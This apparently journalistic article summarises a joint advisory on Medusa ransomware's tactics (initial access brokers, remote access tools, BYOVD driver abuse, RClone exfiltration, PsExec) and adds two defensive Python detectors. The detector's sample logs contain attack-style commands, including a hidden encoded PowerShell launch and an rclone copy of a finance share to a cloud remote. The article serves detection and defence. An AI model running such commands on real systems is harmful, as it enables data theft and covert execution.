The notorious Medusa ransomware group has severely impacted over 300 organizations, particularly in critical sectors like healthcare, manufacturing, and technology. This was revealed in a joint cybersecurity advisory released on Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC).
Since its emergence in 2021, Medusa, which is distinct from the MedusaLocker ransomware, has quickly evolved from a closed operation into a ransomware-as-a-service (RaaS) model. Although it now operates through affiliates, key operations such as ransom negotiations remain under the control of the developers. The advisory highlights that Medusa uses a double extortion approach, where it encrypts victim data and threatens to release exfiltrated data publicly if the ransom is not paid.
Medusa’s Tactics: How Attackers Gain Access
The advisory details how Medusa attackers, often called ‘Medusa actors,’ gain access to targeted environments. They frequently collaborate with initial access brokers from cybercriminal forums to infiltrate systems. During attacks, the group employs various legitimate software tools to move within networks. These tools include remote access programs like AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Additionally, Medusa actors utilize network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner to gather detailed information about systems, users, and networks within the compromised environments.
Medusa’s Stealthy Methods: Avoiding Detection
Medusa attackers have mastered the use of living-off-the-land (LotL) techniques to remain undetected during their operations. They also use increasingly complex PowerShell commands, alongside “Bring Your Own Vulnerable Driver” (BYOVD) attacks. In these attacks, the actors exploit known vulnerabilities in drivers to disable security solutions like endpoint detection and response (EDR) products. This method allows them to operate freely without detection.
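Because BYOVD abuse loads a legitimately signed but vulnerable driver from wherever the attacker dropped it, a useful defensive check is to triage every driver-load event by where the file sits and who signed it. The following is an added example written for this article, not code from the advisory or from Symantec; it operates on a few constructed Sysmon Event ID 6 (DriverLoad)-style records reduced to the fields it needs, and the directory lists, weights and severity thresholds are assumptions a team would tune for its own estate.

```python
"""Triage Windows driver-load records for BYOVD-style tampering (added example).

Input records are constructed for this example and mimic the fields a Sysmon
Event ID 6 (DriverLoad) sensor reports; they are not taken from the advisory.
"""
from __future__ import annotations

from typing import NamedTuple


class DriverLoad(NamedTuple):
    host: str
    image: str            # path of the driver file as reported by the sensor
    signature_valid: bool  # whether the sensor validated the Authenticode signature
    signer: str           # subject name of the signing certificate


# Where Windows normally loads kernel drivers from (assumed baseline, lower-case).
EXPECTED_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)
# Path fragments that indicate a location an ordinary user could write to.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")

# Reason strings and the weight each contributes to the overall score (assumed).
REASON_UNSIGNED = "signature did not validate"
REASON_OUTSIDE = "loaded from outside the normal driver directories"
REASON_WRITABLE = "driver file sits in a user-writable location"
REASON_THIRD_PARTY = "third-party signer"
WEIGHTS = {
    REASON_UNSIGNED: 3,
    REASON_OUTSIDE: 2,
    REASON_WRITABLE: 2,
    REASON_THIRD_PARTY: 1,  # legitimate vendor drivers are signed by third parties too
}


def triage(ev: DriverLoad) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one driver-load record.

    A known-vulnerable driver used to blind EDR is typically validly signed by a
    third party, so the signer alone is weak evidence; the path it was loaded
    from carries most of the weight.
    """
    path = ev.image.lower()
    reasons: list[str] = []
    if not ev.signature_valid:
        reasons.append(REASON_UNSIGNED)
    if not path.startswith(EXPECTED_DIRS):
        reasons.append(REASON_OUTSIDE)
    if any(frag in path for frag in USER_WRITABLE):
        reasons.append(REASON_WRITABLE)
    if ev.signature_valid and "microsoft" not in ev.signer.lower():
        reasons.append(REASON_THIRD_PARTY)

    score = sum(WEIGHTS[r] for r in reasons)
    if score >= 3:
        level = "high"
    elif score == 2:
        level = "medium"
    elif score == 1:
        level = "low"
    else:
        level = "none"
    return level, reasons


# Constructed sample records (hypothetical hosts, file names and signers).
SAMPLE_LOADS = [
    DriverLoad("WS01", r"C:\Windows\System32\drivers\ndis.sys", True, "Microsoft Windows"),
    DriverLoad("WS01", r"C:\Windows\System32\drivers\vendor_gpu.sys", True, "Example Vendor Inc"),
    DriverLoad("SRV02", r"C:\Users\Public\drv.sys", True, "Example Hardware Co"),
    DriverLoad("SRV02", r"C:\Windows\Temp\x.sys", False, ""),
]


def triage_all(events: list[DriverLoad]) -> dict[tuple[str, str], str]:
    """Map (host, image) to severity for a batch of records."""
    return {(ev.host, ev.image): triage(ev)[0] for ev in events}


if __name__ == "__main__":
    for ev in SAMPLE_LOADS:
        level, reasons = triage(ev)
        print(f"{ev.host} {ev.image}: {level} {reasons}")
```

In practice the "high" bucket is what an analyst reviews first, cross-checking the file hash against a vulnerable-driver blocklist; the scoring here only orders the queue, it does not decide on its own that a driver is malicious.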
Notably, Symantec’s Threat Hunter team observed that Medusa’s activity surged by 42% year-over-year in 2024, with continued growth into January and February. The group’s use of both legitimate software and custom malicious tools, such as AVKill and POORTRY, is particularly alarming as they enable the disabling of security mechanisms that would otherwise thwart the attack.
Tools of the Trade: AVKill and RClone
In a recent attack on a healthcare provider, Symantec’s team found that the Medusa actors deployed tools like AVKill, POORTRY, and an unidentified driver to neutralize the organization’s security defenses. RClone, an open-source tool for file synchronization and transfer, was used to exfiltrate data from the compromised systems. In addition, PsExec was employed to remotely execute commands across the victim’s network. After the ransomware encrypted the targeted files, it deleted itself to further obscure its presence.
Cybersecurity Agencies Issue Urgent Mitigation Recommendations
In light of these findings, CISA, the FBI, and MS-ISAC have issued several crucial recommendations for organizations to combat the Medusa ransomware threat. These include disabling command-line and scripting activities to limit the effectiveness of LotL techniques. Since Medusa actors often rely on command-line utilities to escalate privileges and move laterally within networks, restricting these tools can impede the attackers’ ability to spread and escalate attacks.
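The tooling named above (the remote access programs and network scanners in the access section, RClone and PsExec in the healthcare case, and the command-line and scripting activity the agencies recommend restricting) all leaves process-creation telemetry that a defender can match on. The block below is an added example for this article, not code from CISA, the FBI, MS-ISAC or Symantec. It runs a handful of detection rules over constructed Sysmon Event ID 1-style process-creation lines. Matching tools by name fragments in the image path and command line is an assumption made for clarity (binary names vary by vendor and version), the log format is invented for the example, and the approved-tools parameter shows how a team suppresses remote access software it legitimately uses.

```python
"""Process-creation detections for tooling named in the Medusa advisory (added example).

Log lines below are constructed for this example in an invented format:
  <timestamp> <host> image="<full path>" cmd="<command line>"
"""
from __future__ import annotations

import re
from typing import Iterable, NamedTuple


class Finding(NamedTuple):
    host: str
    rule: str
    evidence: str


LOG_LINE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+image="(?P<image>[^"]*)"\s+cmd="(?P<cmd>[^"]*)"$'
)

# Name fragments for the remote access and scanning tools the advisory lists.
# Fragment matching is a deliberate simplification: real binary names vary.
REMOTE_ACCESS_TOOLS = ("anydesk", "atera", "connectwise", "screenconnect", "ehorus",
                       "n-able", "pdq", "simplehelp", "splashtop")
NETWORK_SCANNERS = ("advanced_ip_scanner", "advanced ip scanner", "netscan")

# PowerShell launched with an encoded command of non-trivial length.
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
# An rclone remote argument looks like "name:path"; a single drive letter ("D:\x") does not count.
RCLONE_REMOTE = re.compile(r"(?<!\S)[A-Za-z0-9_-]{2,}:\S*")
RCLONE_VERBS = ("copy", "sync", "move")


def detect(lines: Iterable[str], approved_tools: frozenset[str] = frozenset()) -> list[Finding]:
    """Apply every rule to each parsable line and return the findings in order."""
    findings: list[Finding] = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected format; a real pipeline would count these
        host, image, cmd = m["host"], m["image"].lower(), m["cmd"]
        exe = image.rsplit("\\", 1)[-1]
        haystack = f"{image} {cmd.lower()}"

        for tool in REMOTE_ACCESS_TOOLS:
            if tool in haystack and tool not in approved_tools:
                findings.append(Finding(host, "remote_access_tool", tool))
        for tool in NETWORK_SCANNERS:
            if tool in haystack:
                findings.append(Finding(host, "network_scanner", tool))

        remote = RCLONE_REMOTE.search(cmd)
        if exe.startswith("rclone") and remote and any(v in cmd.lower().split() for v in RCLONE_VERBS):
            findings.append(Finding(host, "rclone_transfer", remote.group(0)))
        if "psexec" in haystack:
            findings.append(Finding(host, "psexec_remote_exec", cmd))
        if exe in ("powershell.exe", "pwsh.exe") and ENCODED_PS.search(cmd):
            findings.append(Finding(host, "encoded_powershell", cmd))
    return findings


# Constructed sample events (hypothetical hosts and paths; the base64 blob is filler).
SAMPLE_EVENTS = [
    r'2025-03-12T09:58:41Z WS01 image="C:\Windows\System32\svchost.exe" cmd="svchost.exe -k netsvcs"',
    r'2025-03-12T10:02:17Z WS01 image="C:\Users\jdoe\Downloads\Advanced_IP_Scanner_2.5.exe" cmd="Advanced_IP_Scanner_2.5.exe"',
    r'2025-03-12T10:05:03Z SRV02 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"',
    r'2025-03-12T10:09:44Z SRV02 image="C:\Tools\rclone.exe" cmd="rclone.exe copy D:\Shares\Finance mega:backup --transfers 8"',
    r'2025-03-12T10:12:09Z DC01 image="C:\Windows\PsExec.exe" cmd="PsExec.exe \\SRV03 cmd.exe /c hostname"',
    r'2025-03-12T10:15:30Z WS07 image="C:\Program Files (x86)\AnyDesk\AnyDesk.exe" cmd="AnyDesk.exe --service"',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule} ({f.evidence})")
```

The rules are intentionally coarse: a remote access tool or network scanner is only suspicious relative to what the organisation has sanctioned, which is why the allowlist is a parameter rather than a hard-coded exception, and an `rclone` transfer to a cloud remote is a strong exfiltration signal on a host that has no business running it.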
By taking these preventive measures, organizations can reduce the likelihood of a successful Medusa attack and strengthen their overall cybersecurity defenses.